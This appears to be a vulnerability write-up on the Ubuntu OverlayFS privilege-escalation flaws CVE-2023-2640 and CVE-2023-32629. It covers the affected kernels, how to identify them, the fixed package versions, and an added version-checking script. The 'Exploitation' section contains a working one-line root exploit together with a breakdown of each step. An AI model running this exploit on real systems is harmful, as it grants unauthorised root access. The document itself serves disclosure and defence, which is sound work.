Ubuntu could allow a local authenticated attacker to gain elevated privileges on the system, caused by skipping permission checking for trusted.overlayfs.* xattrs. By sending a specially crafted request, an attacker could exploit this vulnerability to escalate privileges.
CVE-2023-2640
https://www.cvedetails.com/cve/CVE-2023-2640/
- On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.
CVE-2023-32629
https://www.cvedetails.com/cve/CVE-2023-32629/
- Local privilege escalation vulnerability in Ubuntu kernels: overlayfs ovl_copy_up_meta_inode_data skips permission checks when calling ovl_do_setxattr on Ubuntu kernels.
Vulnerable kernels
6.2.0 Ubuntu 23.04 (Lunar Lobster) / Ubuntu 22.04 LTS (Jammy Jellyfish)
5.19.0 Ubuntu 22.10 (Kinetic Kudu) / Ubuntu 22.04 LTS (Jammy Jellyfish)
5.4.0 Ubuntu 22.04 LTS (Focal Fossa) / Ubuntu 18.04 LTS (Bionic Beaver)
Identification
1. Verify the OS version
- lsb_release -a
2. Verify the kernel version
- uname -r
- uname -a
- cat /proc/version
Exploitation
1. Knowing this is a vulnerable version of Ubuntu (6.2.0), we can proceed to run the following command to become root
- unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
2. After running this command you should become root
Breakdown
- unshare -rm sh -c: This command creates a new mount namespace (-m) and then runs a shell (sh) in it. The -r option also creates a new user namespace and maps the current user to root inside it, which is what allows the later mount to succeed without real root privileges.
- "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;": This is the command that is executed in the new namespace. It does the following:
  - mkdir l u w m: Creates four directories: l, u, w, and m.
  - cp /u*/b*/p*3 l/: Copies the files matching the glob /u*/b*/p*3 (the python3 binary) to the directory l/.
  - setcap cap_setuid+eip l/python3: Sets the cap_setuid capability on the copied python3 binary in l/, with the effective, inheritable and permitted flags (+eip).
  - mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m: Mounts an overlay filesystem using l as the lower directory, u as the upper directory and w as the work directory, merged at m. The overlay filesystem allows combining multiple directories into one.
  - touch m/*: Touches every file in the merged directory m/.
- &&: This is a logical AND operator, which means the next command will be executed only if the previous one succeeds.
- u/python3 -c 'import os; import pty; os.setuid(0); pty.spawn("/bin/bash")': This command is executed if the previous part is successful. It uses the python3 interpreter located in the upper directory u/ to execute a Python script. The Python script imports the os and pty modules, sets the user ID to 0 (root), and spawns a new interactive bash shell using pty.spawn("/bin/bash").
Remedy
The problem can be corrected by updating your system to the following package versions:
- linux-image-6.2.0-1010-gcp – 6.2.0-1010.10
- linux-image-aws – 6.2.0.1008.9
- linux-image-6.2.0-26-generic-64k – 6.2.0-26.26
- linux-image-virtual – 6.2.0.26.26
- linux-image-6.2.0-1008-azure – 6.2.0-1008.8
- linux-image-generic-64k – 6.2.0.26.26
- linux-image-generic – 6.2.0.26.26
- linux-image-6.2.0-1008-oracle – 6.2.0-1008.8
- linux-image-raspi – 6.2.0.1009.12
- linux-image-6.2.0-1009-lowlatency – 6.2.0-1009.9
- linux-image-ibm – 6.2.0.1006.6
- linux-image-6.2.0-26-generic – 6.2.0-26.26
- linux-image-azure – 6.2.0.1008.8
- linux-image-raspi-nolpae – 6.2.0.1009.12
- linux-image-6.2.0-26-generic-lpae – 6.2.0-26.26
- linux-image-kvm – 6.2.0.1009.9
- linux-image-6.2.0-1009-lowlatency-64k – 6.2.0-1009.9
- linux-image-gcp – 6.2.0.1010.10
- linux-image-lowlatency-64k – 6.2.0.1009.9
- linux-image-oracle – 6.2.0.1008.8
- linux-image-6.2.0-1009-kvm – 6.2.0-1009.9
- linux-image-6.2.0-1009-raspi – 6.2.0-1009.11
- linux-image-6.2.0-1006-ibm – 6.2.0-1006.6
- linux-image-generic-lpae – 6.2.0.26.26
- linux-image-6.2.0-1008-aws – 6.2.0-1008.8
- linux-image-lowlatency – 6.2.0.1009.9
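The following script is an added example (not part of the original write-up or of any of the linked repositories) that turns the Remedy list above into a check: it parses `dpkg -l` output, flags installed 6.2.0 kernel packages that are still below the fixed version, and reports whether the Ubuntu-specific `kernel.unprivileged_userns_clone` sysctl is set to 0, which blocks the unprivileged user-namespace step the exploit depends on. The fixed-version table is a subset of the list above, and the embedded `dpkg -l` output is constructed sample data.

```python
import subprocess

# Fixed 6.2.0 package versions taken from the Remedy list above (subset).
FIXED_VERSIONS = {
    "linux-image-6.2.0-26-generic": "6.2.0-26.26",
    "linux-image-generic": "6.2.0.26.26",
    "linux-image-virtual": "6.2.0.26.26",
    "linux-image-aws": "6.2.0.1008.9",
    "linux-image-gcp": "6.2.0.1010.10",
}

# Constructed `dpkg -l` output used for the offline demonstration.
SAMPLE_DPKG = """Desired=Unknown/Install/Remove/Purge/Hold
ii  linux-image-6.2.0-26-generic  6.2.0-26.26     amd64  Signed kernel image generic
ii  linux-image-generic           6.2.0.24.24     amd64  Generic Linux kernel image
ii  linux-image-virtual           6.2.0.26.26     amd64  Virtual Linux kernel image
ii  linux-image-aws               5.19.0.1025.22  amd64  Linux kernel image for AWS
"""

def version_key(version):
    """Turn '6.2.0-26.26' into (6, 2, 0, 26, 26) so versions compare numerically."""
    tokens = version.replace("-", ".").split(".")
    return tuple(int(t) if t.isdigit() else 0 for t in tokens)

def parse_dpkg(text):
    """Return {package: version} for the installed ('ii') rows of `dpkg -l` output."""
    rows = (line.split() for line in text.splitlines())
    return {f[1]: f[2] for f in rows if len(f) >= 3 and f[0] == "ii"}

def outdated_packages(installed, fixed=FIXED_VERSIONS):
    """(package, installed, fixed) for listed 6.2.0 packages still below the fix.
    Other kernel series (5.19, 5.4) have different fixed versions that are not on
    this page, so they are skipped rather than compared against the 6.2.0 numbers."""
    return [(name, installed[name], need) for name, need in fixed.items()
            if name in installed and installed[name].startswith("6.2.0")
            and version_key(installed[name]) < version_key(need)]

def userns_restricted(proc_value):
    """True when kernel.unprivileged_userns_clone reads 0: unprivileged users then
    cannot create user namespaces, so the `unshare -r` step fails (Ubuntu sysctl)."""
    return proc_value.strip() == "0"

if __name__ == "__main__":
    out = subprocess.run(["dpkg", "-l"], capture_output=True, text=True).stdout
    for name, have, need in outdated_packages(parse_dpkg(out)):
        print(f"{name}: installed {have}, fixed in {need}")
    try:
        with open("/proc/sys/kernel/unprivileged_userns_clone") as f:
            print("unprivileged user namespaces disabled:", userns_restricted(f.read()))
    except FileNotFoundError:
        print("kernel.unprivileged_userns_clone sysctl not present on this kernel")
```

Disabling unprivileged user namespaces is a workaround, not a fix; the package update is still required.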
Sources
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
https://www.cvedetails.com/cve/CVE-2023-2640/
https://www.cvedetails.com/cve/CVE-2023-32629/
https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640—POC-Escalation